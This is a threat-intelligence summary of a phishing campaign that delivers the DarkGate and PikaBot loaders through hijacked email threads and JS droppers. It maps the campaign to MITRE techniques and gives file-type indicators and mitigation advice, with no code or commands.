Threat Research

Are DarkGate and PikaBot the New QakBot? | Cofense

admin

A widespread phishing campaign that started distributing DarkGate in September has evolved with evasive, anti-analysis measures and now also delivers PikaBot, using tactics similar to QakBot campaigns. The attack chain commonly uses hijacked email threads, tailored URLs that enforce browser/geolocation checks, and archive-contained JS droppers that fetch loader malware capable of delivering further payloads. #DarkGate #PikaBot

Keypoints

  • The campaign began after QakBot activity subsided and mirrors QakBot TTPs, including timeline and delivery patterns.
  • Initial access is commonly gained via hijacked email threads containing malicious links, increasing recipient trust.
  • Phishing URLs include unique patterns and checks (browser and geolocation) that restrict access to intended victims.
  • Most common infection chain: URL → ZIP archive → JS Dropper (.js) → remote payload download and execution (DarkGate or PikaBot).
  • DarkGate and PikaBot act as loaders with anti-analysis features; both can fetch and install additional payloads (recon tools, miners, ransomware).
  • Other delivery methods observed include Excel-DNA (.xll) add-ins, VBS downloaders, and LNK shortcut downloaders.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Use of targeted messages with malicious links delivered via hijacked threads to induce clicks; quote: “…The campaign begins with a hijacked email thread to bait users into interacting with a URL…”
  • [T1190] Exploit Public-Facing Application – Threat actors may obtain hijacked threads through Exchange ProxyLogon exploitation; quote: “…hijacked email threads that may be obtained from Microsoft ProxyLogon attacks (CVE-2021-26855).”
  • [T1199] Trusted Relationship – Leveraging existing conversation context to increase recipient trust and likelihood of interaction; quote: “…Responding to email threads creates an added layer of trust between the threat actors and the target…”
  • [T1105] Ingress Tool Transfer – JS droppers reach out to external URLs to download and write malicious payloads to disk; quote: “…a JS Dropper… used to reach out to another URL to download and run malware.”
  • [T1497] Virtualization/Sandbox Evasion – Malware contains checks and evasive techniques to detect/avoid sandboxes, VMs, and debuggers; quote: “…contains several evasive techniques to avoid sandboxes, virtual machines, and other debugging techniques.”
  • [T1204] User Execution – Delivery relies on user interaction to open archive and execute JS/VBS/LNK/Excel add-ins that trigger payload download and execution; quote: “…This URL downloads a ZIP archive that contains a JS file that is a JS Dropper…”

Indicators of Compromise

  • [File Type] Malicious archive/dropper context – .zip containing .js dropper (JS Dropper), and other similar archive-delivered droppers
  • [File Type] Script/add-in loaders – .js (JS Dropper), .vbs (VBS downloader), .lnk (LNK downloader), .xll (Excel-DNA add-in)
  • [Vulnerability] Exploited service context – CVE-2021-26855 (ProxyLogon) used to obtain hijacked email threads
  • [URL Pattern] Phishing URL context – URLs with unique patterns enforcing browser/geolocation checks (e.g., Chrome+US) as shown in the campaign examples and figure references

The attack typically begins with a hijacked corporate email thread carrying a specialized phishing URL that enforces environment checks (browser type and geolocation). When a victim in the allowed context follows the link, the site serves a ZIP archive containing a JavaScript dropper; executing the JS dropper causes it to contact a remote host and download the loader payload (DarkGate or PikaBot), write it to disk, and execute it. These droppers perform the ingress tool transfer and rely on user execution to progress through the chain.

Both DarkGate and PikaBot include loader behavior and anti-analysis/sandbox-evasion routines. DarkGate often uses AutoIT scripts, supports plugin-like modules (credential theft, remote access, crypto-mining, privilege escalation), and runs multiple AutoIT files; PikaBot is a 2023 loader observed excluding CIS-region victims and employing checks to detect sandboxes/VMs. Successful infections enable follow-on actions: additional payload retrieval (recon tools, miners, ransomware) and lateral or privilege escalation depending on modules deployed.

Operators have experimented with alternative delivery mechanisms beyond JS droppers, notably Excel-DNA XLL add-ins that fetch payloads, VBS-based downloaders invoked via cscript/wscript, and malicious LNK shortcuts that execute referenced content. Detection and mitigation should focus on blocking suspicious attachments (.js, .vbs, .xll, .lnk), monitoring unusual external downloads, and hardening public-facing Exchange services against ProxyLogon exploitation.

Read more: https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint